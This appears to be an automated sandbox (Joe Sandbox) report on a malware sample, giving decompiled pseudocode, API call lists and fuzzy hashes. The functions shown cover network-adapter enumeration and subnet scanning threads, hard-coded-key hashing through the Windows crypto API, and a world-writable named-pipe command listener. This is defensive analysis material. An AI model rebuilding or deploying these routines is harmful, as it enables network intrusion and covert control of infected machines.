                                                                                                          C-Code - Quality: 67%
                                                                                                          			E04A48B2E(intOrPtr* _a4, void* _a8, int _a16, void _a20, int _a4112, void _a4116) {
                                                                                                          				int _v0;
                                                                                                          				int _v4;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				void* _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				signed int _v32;
                                                                                                          				void* __esi;
                                                                                                          				void* _t69;
                                                                                                          				void* _t73;
                                                                                                          				void* _t75;
                                                                                                          				signed int _t77;
                                                                                                          				signed int _t80;
                                                                                                          				void _t81;
                                                                                                          				void* _t84;
                                                                                                          				void* _t93;
                                                                                                          				void* _t100;
                                                                                                          				struct _SECURITY_ATTRIBUTES* _t101;
                                                                                                          				signed int _t105;
                                                                                                          				signed int _t108;
                                                                                                          				signed int _t109;
                                                                                                          				void* _t110;
                                                                                                          				intOrPtr* _t112;
                                                                                                          				intOrPtr* _t113;
                                                                                                          				void* _t114;
                                                                                                          				intOrPtr* _t115;
                                                                                                          				void* _t117;
                                                                                                          				signed int _t122;
                                                                                                          				void* _t125;
                                                                                                          
                                                                                                          				E04A4A760(0x3014);
                                                                                                          				_t101 = 0;
                                                                                                          				_a16 = 0;
                                                                                                          				memset( &_a20, 0, 0xffc);
                                                                                                          				_a4112 = 0;
                                                                                                          				memset( &_a4116, 0, 0x1ffc);
                                                                                                          				_t115 = __imp__GetAdaptersInfo;
                                                                                                          				_t125 = (_t122 & 0xfffffff8) + 0x18;
                                                                                                          				_a8 = 0;
                                                                                                          				_v4 = 0;
                                                                                                          				_v0 = 0;
                                                                                                          				_t69 =  *_t115(0,  &_a8, _t110, _t114, _t100); // executed
                                                                                                          				if(_t69 != 0x6f) {
                                                                                                          					L23:
                                                                                                          					return 0;
                                                                                                          				}
                                                                                                          				_t112 = LocalAlloc(0x40, _v0);
                                                                                                          				_a4 = _t112;
                                                                                                          				if(_t112 == 0) {
                                                                                                          					goto L23;
                                                                                                          				}
                                                                                                          				_t73 =  *_t115(_t112,  &_v0); // executed
                                                                                                          				if(_t73 != 0) {
                                                                                                          					L22:
                                                                                                          					LocalFree(_v4);
                                                                                                          					goto L23;
                                                                                                          				}
                                                                                                          				while(_v20 < 0x400) {
                                                                                                          					if( *((intOrPtr*)(_t112 + 0x1a4)) != _t101) {
                                                                                                          						_t28 = _t112 + 0x200; // 0x200
                                                                                                          						_t93 = E04A4641A(_t28);
                                                                                                          						_v24 = _t93;
                                                                                                          						if(_t93 != _t101) {
                                                                                                          							E04A46B95(_t93, 0, _a4);
                                                                                                          							HeapFree(GetProcessHeap(), _t101, _v24);
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_t112 =  *_t112;
                                                                                                          					_v28 = _v28 + 1;
                                                                                                          					if(_t112 != _t101) {
                                                                                                          						continue;
                                                                                                          					}
                                                                                                          					break;
                                                                                                          				}
                                                                                                          				_t75 = E04A47D4E(_t103); // executed
                                                                                                          				if(_t75 != 0) {
                                                                                                          					E04A48D39(_a4);
                                                                                                          				}
                                                                                                          				if(_v20 <= _t101) {
                                                                                                          					L20:
                                                                                                          					if(_v16 <= _t101) {
                                                                                                          						goto L22;
                                                                                                          					} else {
                                                                                                          						goto L21;
                                                                                                          					}
                                                                                                          					do {
                                                                                                          						L21:
                                                                                                          						CloseHandle( *(_t125 + 0x20 + _t101 * 4));
                                                                                                          						_t101 =  &(_t101->nLength);
                                                                                                          					} while (_t101 < _v16);
                                                                                                          					goto L22;
                                                                                                          				} else {
                                                                                                          					_t113 = __imp__#14;
                                                                                                          					do {
                                                                                                          						_t77 = LocalAlloc(0x40, 0xc);
                                                                                                          						_t117 = _t77;
                                                                                                          						if(_t117 != _t101) {
                                                                                                          							__imp__#11("255.255.255.255");
                                                                                                          							_t108 = _v20;
                                                                                                          							_t109 =  *(_t125 + 0x1024 + _t108 * 8);
                                                                                                          							_t105 =  *(_t125 + 0x1020 + _t108 * 8) & _t109;
                                                                                                          							if(_t105 != 0) {
                                                                                                          								_t80 = _t77 ^ _t109 | _t105;
                                                                                                          								_v16 = _t80;
                                                                                                          								if(_t80 != 0) {
                                                                                                          									_t81 =  *_t113(_t105);
                                                                                                          									 *_t117 = _t81;
                                                                                                          									 *((intOrPtr*)(_t117 + 4)) =  *_t113(_v20);
                                                                                                          									 *((intOrPtr*)(_t117 + 8)) = _a4;
                                                                                                          									_t84 = CreateThread(_t101, _t101, E04A48AB3, _t117, _t101, _t101); // executed
                                                                                                          									if(_t84 != _t101) {
                                                                                                          										 *(_t125 + 0x20 + _v32 * 4) = _t84;
                                                                                                          									}
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          						_v16 = _v16 + 1;
                                                                                                          					} while (_v16 < _v20);
                                                                                                          					goto L20;
                                                                                                          				}
                                                                                                          			}
































                                                                                                          0x04a48b39
                                                                                                          0x04a48b41
                                                                                                          0x04a48b4e
                                                                                                          0x04a48b52
                                                                                                          0x04a48b68
                                                                                                          0x04a48b6f
                                                                                                          0x04a48b74
                                                                                                          0x04a48b7a
                                                                                                          0x04a48b83
                                                                                                          0x04a48b87
                                                                                                          0x04a48b8b
                                                                                                          0x04a48b8f
                                                                                                          0x04a48b94
                                                                                                          0x04a48d2e
                                                                                                          0x04a48d36
                                                                                                          0x04a48d36
                                                                                                          0x04a48ba6
                                                                                                          0x04a48ba8
                                                                                                          0x04a48bae
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a48bba
                                                                                                          0x04a48bbe
                                                                                                          0x04a48d24
                                                                                                          0x04a48d28
                                                                                                          0x00000000
                                                                                                          0x04a48d28
                                                                                                          0x04a48bc4
                                                                                                          0x04a48c37
                                                                                                          0x04a48c39
                                                                                                          0x04a48c40
                                                                                                          0x04a48c45
                                                                                                          0x04a48c4b
                                                                                                          0x04a48c52
                                                                                                          0x04a48c63
                                                                                                          0x04a48c63
                                                                                                          0x04a48c4b
                                                                                                          0x04a48c69
                                                                                                          0x04a48c6b
                                                                                                          0x04a48c71
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a48c71
                                                                                                          0x04a48c77
                                                                                                          0x04a48c7e
                                                                                                          0x04a48c83
                                                                                                          0x04a48c83
                                                                                                          0x04a48c8c
                                                                                                          0x04a48d0d
                                                                                                          0x04a48d11
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a48d13
                                                                                                          0x04a48d13
                                                                                                          0x04a48d17
                                                                                                          0x04a48d1d
                                                                                                          0x04a48d1e
                                                                                                          0x00000000
                                                                                                          0x04a48c8e
                                                                                                          0x04a48c8e
                                                                                                          0x04a48c94
                                                                                                          0x04a48c98
                                                                                                          0x04a48c9e
                                                                                                          0x04a48ca2
                                                                                                          0x04a48ca9
                                                                                                          0x04a48caf
                                                                                                          0x04a48cba
                                                                                                          0x04a48cc1
                                                                                                          0x04a48cc3
                                                                                                          0x04a48cc7
                                                                                                          0x04a48cc9
                                                                                                          0x04a48ccd
                                                                                                          0x04a48cd0
                                                                                                          0x04a48cd6
                                                                                                          0x04a48ce2
                                                                                                          0x04a48cea
                                                                                                          0x04a48ced
                                                                                                          0x04a48cf5
                                                                                                          0x04a48cfb
                                                                                                          0x04a48cfb
                                                                                                          0x04a48cf5
                                                                                                          0x04a48ccd
                                                                                                          0x04a48cc3
                                                                                                          0x04a48cff
                                                                                                          0x04a48d07
                                                                                                          0x00000000
                                                                                                          0x04a48c94

                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 04A48B52
                                                                                                          • memset.MSVCRT ref: 04A48B6F
                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04A48B8F
                                                                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 04A48BA0
                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04A48BBA
                                                                                                          • inet_addr.WS2_32(000001B0), ref: 04A48BDF
                                                                                                          • inet_addr.WS2_32(000001C0), ref: 04A48BF3
                                                                                                            • Part of subcall function 04A4641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04A48E53,000000FF,00000000,00000000,00000000,00000000,77454AB0,?,04A48E53,00000000), ref: 04A46439
                                                                                                            • Part of subcall function 04A4641A: GetProcessHeap.KERNEL32(00000000,00000000,?,04A48E53,00000000), ref: 04A46446
                                                                                                            • Part of subcall function 04A4641A: HeapAlloc.KERNEL32(00000000,?,04A48E53,00000000), ref: 04A4644D
                                                                                                            • Part of subcall function 04A4641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04A48E53,000000FF,00000000,00000000,?,04A48E53,00000000), ref: 04A46465
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 04A48C24
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A48C2B
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 04A48C5C
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A48C63
                                                                                                          • LocalAlloc.KERNEL32(00000040,0000000C), ref: 04A48C98
                                                                                                          • inet_addr.WS2_32(255.255.255.255), ref: 04A48CA9
                                                                                                          • htonl.WS2_32(?), ref: 04A48CD0
                                                                                                          • htonl.WS2_32(?), ref: 04A48CD8
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,04A48AB3,00000000,00000000,00000000), ref: 04A48CED
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A48D17
                                                                                                          • LocalFree.KERNEL32(?), ref: 04A48D28
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocFreeLocalProcessinet_addr$AdaptersByteCharInfoMultiWidehtonlmemset$CloseCreateHandleThread
                                                                                                          • String ID: Oqt Uqt0Xqt$255.255.255.255
                                                                                                          • API String ID: 698255058-360620975
                                                                                                          • Opcode ID: b65595e781867f0c01ffdf13eddf45308a723df0d75b0c764676005c506ef557
                                                                                                          • Instruction ID: 0b8133d682f3df9afaec568e00531faf190326f5bc757825f6d384addf8a1ef0
                                                                                                          • Opcode Fuzzy Hash: b65595e781867f0c01ffdf13eddf45308a723df0d75b0c764676005c506ef557
                                                                                                          • Instruction Fuzzy Hash: E4519EB9905306AFD710EF64E98496FBBE9FBC8304F10492DFA8596140C739E809CF92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 375 4a415a7-4a415eb GetProcessHeap HeapAlloc 376 4a415f1-4a4160b CryptAcquireContextW 375->376 377 4a4173d-4a41744 375->377 376->377 378 4a41611-4a4161b 376->378 379 4a41621-4a41622 378->379 380 4a416be-4a416d2 CryptCreateHash 378->380 383 4a41710 379->383 384 4a41628-4a4163c GetProcessHeap HeapAlloc 379->384 381 4a416d4 380->381 382 4a41712-4a41715 380->382 385 4a416d8-4a416dc 381->385 387 4a41717-4a4171a CryptDestroyHash 382->387 388 4a41720-4a41723 382->388 383->382 384->383 386 4a41642-4a41676 CryptImportKey 384->386 385->382 389 4a416de-4a416f0 CryptHashData 385->389 390 4a41678-4a41690 CryptCreateHash 386->390 391 4a416aa-4a416bc 386->391 387->388 392 4a41725-4a41728 CryptDestroyKey 388->392 393 4a4172e-4a41731 388->393 389->382 395 4a416f2-4a41709 CryptGetHashParam 389->395 390->391 396 4a41692-4a416a4 CryptSetHashParam 390->396 391->385 392->393 393->377 394 4a41733-4a41737 CryptReleaseContext 393->394 394->377 395->382 398 4a4170b-4a4170e 395->398 396->391 399 4a416a6 396->399 398->382 399->391
                                                                                                          C-Code - Quality: 21%
                                                                                                          			E04A415A7(intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16, intOrPtr _a20) {
                                                                                                          				char _v8;
                                                                                                          				long* _v12;
                                                                                                          				signed int _v16;
                                                                                                          				long* _v20;
                                                                                                          				long _v24;
                                                                                                          				char _v44;
                                                                                                          				void* _t45;
                                                                                                          				long** _t47;
                                                                                                          				int _t48;
                                                                                                          				void** _t52;
                                                                                                          				int _t56;
                                                                                                          				char* _t58;
                                                                                                          				char* _t59;
                                                                                                          				void* _t61;
                                                                                                          				void* _t64;
                                                                                                          				long _t70;
                                                                                                          				int _t71;
                                                                                                          
                                                                                                          				_v12 = 0;
                                                                                                          				_v20 = 0;
                                                                                                          				_v8 = 0;
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				_t70 = 0x10;
                                                                                                          				asm("stosd");
                                                                                                          				_v24 = _t70;
                                                                                                          				_v16 = 0xbadf00d;
                                                                                                          				asm("stosd");
                                                                                                          				_t45 = HeapAlloc(GetProcessHeap(), 8, _t70);
                                                                                                          				 *_a16 = _t45;
                                                                                                          				if(_t45 == 0) {
                                                                                                          					L23:
                                                                                                          					return _v16;
                                                                                                          				}
                                                                                                          				_t47 =  &_v12;
                                                                                                          				__imp__CryptAcquireContextW(_t47, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000008); // executed
                                                                                                          				if(_t47 == 0) {
                                                                                                          					goto L23;
                                                                                                          				}
                                                                                                          				_t48 = 0x8002;
                                                                                                          				_t64 = _a20 - 0x8002;
                                                                                                          				if(_t64 == 0) {
                                                                                                          					_t71 = 0;
                                                                                                          					__imp__CryptCreateHash(_v12, 0x8002, 0, 0,  &_v8); // executed
                                                                                                          					if(0x8002 == 0) {
                                                                                                          						L17:
                                                                                                          						if(_v8 != _t71) {
                                                                                                          							__imp__CryptDestroyHash(_v8);
                                                                                                          						}
                                                                                                          						if(_v20 != _t71) {
                                                                                                          							CryptDestroyKey(_v20);
                                                                                                          						}
                                                                                                          						if(_v12 != _t71) {
                                                                                                          							CryptReleaseContext(_v12, _t71);
                                                                                                          						}
                                                                                                          						goto L23;
                                                                                                          					}
                                                                                                          					_v16 = _v16 | 0xffffffff;
                                                                                                          					L12:
                                                                                                          					if(_v16 == 0xffffffff) {
                                                                                                          						__imp__CryptHashData(_v8, _a4, _a8, _t71);
                                                                                                          						if(_t48 != 0) {
                                                                                                          							_t52 = _a16;
                                                                                                          							__imp__CryptGetHashParam(_v8, 2,  *_t52,  &_v24, _t71);
                                                                                                          							if(_t52 != 0) {
                                                                                                          								_v16 = _t71;
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          					goto L17;
                                                                                                          				}
                                                                                                          				if(_t64 != 1) {
                                                                                                          					L16:
                                                                                                          					_t71 = 0;
                                                                                                          					goto L17;
                                                                                                          				}
                                                                                                          				_v44 = 0x8003;
                                                                                                          				_t61 = HeapAlloc(GetProcessHeap(), 8, 0x20);
                                                                                                          				if(_t61 == 0) {
                                                                                                          					goto L16;
                                                                                                          				}
                                                                                                          				 *(_t61 + 8) = _t70;
                                                                                                          				 *_t61 = 0x208;
                                                                                                          				 *((intOrPtr*)(_t61 + 4)) = 0x6602;
                                                                                                          				asm("movsd");
                                                                                                          				asm("movsd");
                                                                                                          				asm("movsd");
                                                                                                          				asm("movsd");
                                                                                                          				_t56 = CryptImportKey(_v12, _t61, 0x20, 0, 0x100,  &_v20); // executed
                                                                                                          				if(_t56 != 0) {
                                                                                                          					_t58 =  &_v8;
                                                                                                          					__imp__CryptCreateHash(_v12, 0x8009, _v20, 0, _t58);
                                                                                                          					if(_t58 != 0) {
                                                                                                          						_t59 =  &_v44;
                                                                                                          						__imp__CryptSetHashParam(_v8, 5, _t59, 0);
                                                                                                          						if(_t59 != 0) {
                                                                                                          							_v16 = _v16 | 0xffffffff;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t48 = HeapFree(GetProcessHeap(), 8, _t61);
                                                                                                          				_t71 = 0;
                                                                                                          				goto L12;
                                                                                                          			}




















                                                                                                          0x04a415b8
                                                                                                          0x04a415bb
                                                                                                          0x04a415be
                                                                                                          0x04a415c4
                                                                                                          0x04a415c5
                                                                                                          0x04a415c8
                                                                                                          0x04a415c9
                                                                                                          0x04a415ca
                                                                                                          0x04a415ce
                                                                                                          0x04a415d1
                                                                                                          0x04a415d8
                                                                                                          0x04a415e2
                                                                                                          0x04a415e7
                                                                                                          0x04a415eb
                                                                                                          0x04a4173d
                                                                                                          0x04a41744
                                                                                                          0x04a41744
                                                                                                          0x04a415ff
                                                                                                          0x04a41603
                                                                                                          0x04a4160b
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a41614
                                                                                                          0x04a41619
                                                                                                          0x04a4161b
                                                                                                          0x04a416c2
                                                                                                          0x04a416ca
                                                                                                          0x04a416d2
                                                                                                          0x04a41712
                                                                                                          0x04a41715
                                                                                                          0x04a4171a
                                                                                                          0x04a4171a
                                                                                                          0x04a41723
                                                                                                          0x04a41728
                                                                                                          0x04a41728
                                                                                                          0x04a41731
                                                                                                          0x04a41737
                                                                                                          0x04a41737
                                                                                                          0x00000000
                                                                                                          0x04a41731
                                                                                                          0x04a416d4
                                                                                                          0x04a416d8
                                                                                                          0x04a416dc
                                                                                                          0x04a416e8
                                                                                                          0x04a416f0
                                                                                                          0x04a416f7
                                                                                                          0x04a41701
                                                                                                          0x04a41709
                                                                                                          0x04a4170b
                                                                                                          0x04a4170b
                                                                                                          0x04a41709
                                                                                                          0x04a416f0
                                                                                                          0x00000000
                                                                                                          0x04a416dc
                                                                                                          0x04a41622
                                                                                                          0x04a41710
                                                                                                          0x04a41710
                                                                                                          0x00000000
                                                                                                          0x04a41710
                                                                                                          0x04a4162c
                                                                                                          0x04a41638
                                                                                                          0x04a4163c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a41642
                                                                                                          0x04a41648
                                                                                                          0x04a4164e
                                                                                                          0x04a41658
                                                                                                          0x04a41659
                                                                                                          0x04a4165a
                                                                                                          0x04a41664
                                                                                                          0x04a4166e
                                                                                                          0x04a41676
                                                                                                          0x04a41678
                                                                                                          0x04a41688
                                                                                                          0x04a41690
                                                                                                          0x04a41693
                                                                                                          0x04a4169c
                                                                                                          0x04a416a4
                                                                                                          0x04a416a6
                                                                                                          0x04a416a6
                                                                                                          0x04a416a4
                                                                                                          0x04a41690
                                                                                                          0x04a416b4
                                                                                                          0x04a416ba
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000010,77D44620,?,74714F20), ref: 04A415D9
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A415E2
                                                                                                          • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000008), ref: 04A41603
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000020), ref: 04A41633
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A41636
                                                                                                          • CryptImportKey.ADVAPI32(?,00000000,00000020,00000000,00000100,?), ref: 04A4166E
                                                                                                          • CryptCreateHash.ADVAPI32(?,00008009,?,00000000,?), ref: 04A41688
                                                                                                          • CryptSetHashParam.ADVAPI32(?,00000005,00008003,00000000), ref: 04A4169C
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A416AD
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A416B4
                                                                                                          • CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?), ref: 04A416CA
                                                                                                          • CryptHashData.ADVAPI32(?,?,000000FF,00000000), ref: 04A416E8
                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 04A41701
                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 04A4171A
                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 04A41728
                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04A41737
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Crypt$HashHeap$Process$AllocContextCreateDestroyParam$AcquireDataFreeImportRelease
                                                                                                          • String ID: Oqt Uqt0Xqt$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                          • API String ID: 2620112963-1409567478
                                                                                                          • Opcode ID: d2f3183199edb8dfd1e8c3efe2c25c9db1d90c4590a4aa3fb53436717352fca6
                                                                                                          • Instruction ID: d937160264e28b8f1c6fc3108605c5ca2da6f32d9e7a84796fbe6e2078807c0d
                                                                                                          • Opcode Fuzzy Hash: d2f3183199edb8dfd1e8c3efe2c25c9db1d90c4590a4aa3fb53436717352fca6
                                                                                                          • Instruction Fuzzy Hash: 93517A75A00219BBEB208FA5DC48AAFBB79FFD8750F004054F605FA190DB759A42DFA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 92%
                                                                                                          			E04A46FFE(WCHAR* _a4) {
                                                                                                          				void* _v8;
                                                                                                          				long _v12;
                                                                                                          				long _v16;
                                                                                                          				struct _SECURITY_ATTRIBUTES _v28;
                                                                                                          				struct _SECURITY_DESCRIPTOR* _t25;
                                                                                                          				void* _t30;
                                                                                                          				int _t31;
                                                                                                          				int _t34;
                                                                                                          				WCHAR* _t44;
                                                                                                          				void* _t50;
                                                                                                          				void* _t51;
                                                                                                          
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				_v28.nLength = 0xc;
                                                                                                          				_v28.bInheritHandle = 0;
                                                                                                          				_t25 = HeapAlloc(GetProcessHeap(), 8, 0x14);
                                                                                                          				_v28.lpSecurityDescriptor = _t25;
                                                                                                          				if(_t25 == 0 || InitializeSecurityDescriptor(_t25, 1) == 0 || SetSecurityDescriptorDacl(_v28.lpSecurityDescriptor, 1, 0, 0) == 0) {
                                                                                                          					return 0;
                                                                                                          				} else {
                                                                                                          					while(1) {
                                                                                                          						L3:
                                                                                                          						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
                                                                                                          						_v8 = _t30;
                                                                                                          						if(_t30 == 0xffffffff) {
                                                                                                          							continue;
                                                                                                          						}
                                                                                                          						L4:
                                                                                                          						_t31 = ConnectNamedPipe(_t30, 0); // executed
                                                                                                          						if(_t31 == 0) {
                                                                                                          							L18:
                                                                                                          							CloseHandle(_v8);
                                                                                                          							do {
                                                                                                          								goto L3;
                                                                                                          							} while (_t30 == 0xffffffff);
                                                                                                          							goto L4;
                                                                                                          						} else {
                                                                                                          							_t50 = 0x1e;
                                                                                                          							do {
                                                                                                          								_t50 = _t50 - 1;
                                                                                                          								_v12 = 0;
                                                                                                          								_t34 = PeekNamedPipe(_v8, 0, 0, 0,  &_v12, 0); // executed
                                                                                                          								if(_t34 == 0) {
                                                                                                          									goto L9;
                                                                                                          								}
                                                                                                          								if(_v12 != 0) {
                                                                                                          									_t51 = HeapAlloc(GetProcessHeap(), 8, _v12);
                                                                                                          									if(_t51 != 0) {
                                                                                                          										_v16 = 0;
                                                                                                          										if(ReadFile(_v8, _t51, _v12,  &_v16, 0) != 0 && _v16 == _v12) {
                                                                                                          											_t44 = StrChrW(_t51, 0x3a);
                                                                                                          											if(_t44 != 0) {
                                                                                                          												 *_t44 = 0;
                                                                                                          												E04A469AE(_t51,  &(_t44[1]), 2);
                                                                                                          											}
                                                                                                          										}
                                                                                                          										HeapFree(GetProcessHeap(), 0, _t51);
                                                                                                          									}
                                                                                                          									L17:
                                                                                                          									FlushFileBuffers(_v8);
                                                                                                          									DisconnectNamedPipe(_v8);
                                                                                                          									goto L18;
                                                                                                          								}
                                                                                                          								Sleep(0x3e8); // executed
                                                                                                          								L9:
                                                                                                          							} while (_t50 != 0);
                                                                                                          							goto L17;
                                                                                                          						}
                                                                                                          						L3:
                                                                                                          						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
                                                                                                          						_v8 = _t30;
                                                                                                          					}
                                                                                                          				}
                                                                                                          			}














                                                                                                          0x04a47012
                                                                                                          0x04a47013
                                                                                                          0x04a47016
                                                                                                          0x04a4701b
                                                                                                          0x04a47022
                                                                                                          0x04a47028
                                                                                                          0x04a4702e
                                                                                                          0x04a47033
                                                                                                          0x04a47143
                                                                                                          0x00000000
                                                                                                          0x04a4705f
                                                                                                          0x04a4705f
                                                                                                          0x04a4706f
                                                                                                          0x04a47075
                                                                                                          0x04a4707b
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4707d
                                                                                                          0x04a4707f
                                                                                                          0x04a47087
                                                                                                          0x04a4712f
                                                                                                          0x04a47132
                                                                                                          0x04a4705f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4708d
                                                                                                          0x04a4708f
                                                                                                          0x04a47090
                                                                                                          0x04a4709b
                                                                                                          0x04a4709c
                                                                                                          0x04a4709f
                                                                                                          0x04a470a7
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a470ac
                                                                                                          0x04a470cd
                                                                                                          0x04a470d1
                                                                                                          0x04a470db
                                                                                                          0x04a470ea
                                                                                                          0x04a470f7
                                                                                                          0x04a470ff
                                                                                                          0x04a47103
                                                                                                          0x04a4710d
                                                                                                          0x04a4710d
                                                                                                          0x04a470ff
                                                                                                          0x04a47117
                                                                                                          0x04a47117
                                                                                                          0x04a4711d
                                                                                                          0x04a47120
                                                                                                          0x04a47129
                                                                                                          0x00000000
                                                                                                          0x04a47129
                                                                                                          0x04a470b3
                                                                                                          0x04a470b9
                                                                                                          0x04a470b9
                                                                                                          0x00000000
                                                                                                          0x04a470bd
                                                                                                          0x04a4705f
                                                                                                          0x04a4706f
                                                                                                          0x04a47075
                                                                                                          0x04a47078
                                                                                                          0x04a4705f

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000014), ref: 04A47025
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A47028
                                                                                                          • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 04A4703C
                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 04A47051
                                                                                                          • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 04A4706F
                                                                                                          • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 04A4707F
                                                                                                          • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 04A4709F
                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 04A470B3
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A470C4
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A470C7
                                                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 04A470E2
                                                                                                          • StrChrW.SHLWAPI(00000000,0000003A), ref: 04A470F7
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04A47114
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A47117
                                                                                                          • FlushFileBuffers.KERNEL32(?), ref: 04A47120
                                                                                                          • DisconnectNamedPipe.KERNEL32(?), ref: 04A47129
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A47132
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$NamedPipe$Process$AllocDescriptorFileSecurity$BuffersCloseConnectCreateDaclDisconnectFlushFreeHandleInitializePeekReadSleep
                                                                                                          • String ID: Uqt0Xqt
                                                                                                          • API String ID: 1225799970-3529349503
